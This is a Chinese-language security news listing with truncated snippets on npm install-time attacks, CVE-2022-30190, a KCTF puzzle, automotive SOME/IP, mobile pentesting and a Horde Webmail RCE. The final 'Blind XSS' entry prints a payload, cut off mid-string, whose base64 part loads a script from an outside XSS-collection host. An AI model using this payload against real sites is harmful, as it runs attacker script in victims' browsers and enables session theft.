狼又来啦!快使用LATCH来阻止npm生态的安装时攻击
原文作者:Elizabeth Wyss, Alexander Wittman, Drew Davidson原文标题:Wolf at the Door: Preventing Install-Time Attacks in npm with Latch原文链接:ht...
攻击技术研判 | CVE-2022-30190 在野利用研判
情报背景近期安全研究员nao_sec发现了一份由白俄罗斯IP提交到VirusTotal平台的恶意Word文档,该文档利用Windows中的0day漏洞进行攻击,并最终在目标机器上远...
看雪2022 KCTF 春季赛 | 第11题设计思路及解析
看雪 2022 KCTF春季赛 于5月10日中午12点正式开赛!第11题《虫洞末世》已于昨日中午12点截止答题。经统计,共7队成功提交flag。他们分别是:接下来和我...
汽车以太网协议之 SOME/IP(上)
一背景介绍2011年,宝马集团开发设计了一套中间件,该中间件能够实现以服务为导向的通信方式,宝马将该面向服务的通信方式叫做 SOME/IP。由于其知名度逐渐被 ...
汽车以太网协议之 SOME/IP(下)
本篇文章接上篇《汽车以太网协议之 SOME/IP(上)》,介绍 Wireshark 解析 SOME/IP 协议以及利用 ANDi 模拟发送 SOME/IP & SOME/IP-SD 包一Wireshark 解...
移动安全渗透测试清单 2022
原文:https://hackersonlineclub.com/mobile-security-penetration-testing/多合一移动安全框架的移动安全渗透测试列表,包括 Android 和 iOS 应用程序渗透...
每日安全动态推送(06-06)
Tencent Security Xuanwu Lab Daily News• Active Exploitation of Confluence CVE-2022-26134:https://blog.rapid7.com/2022/06/02/active-exploitatio...
ABB工业机器人-GOFA机器人建立虚拟系统与仿真
1.ABB最新协作机器人GOFA已经正式对外销售2.Robotstudio2021.1中也可以加入该机器人系统3.创建和使用方式如下:4.打开Robotstudio2021,进入如下“安装管理器”...
Horde Webmail远程代码执行漏洞
Horde Webmail远程代码执行漏洞。Sonar研究人员在Horde Webmail中发现一个安全漏洞,CVE编号CVE-2022-30287,攻击者利用该漏洞可以在受害者打开攻击者发送的...
Blind XSS
Payload:'><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2x3YS54c3Mua...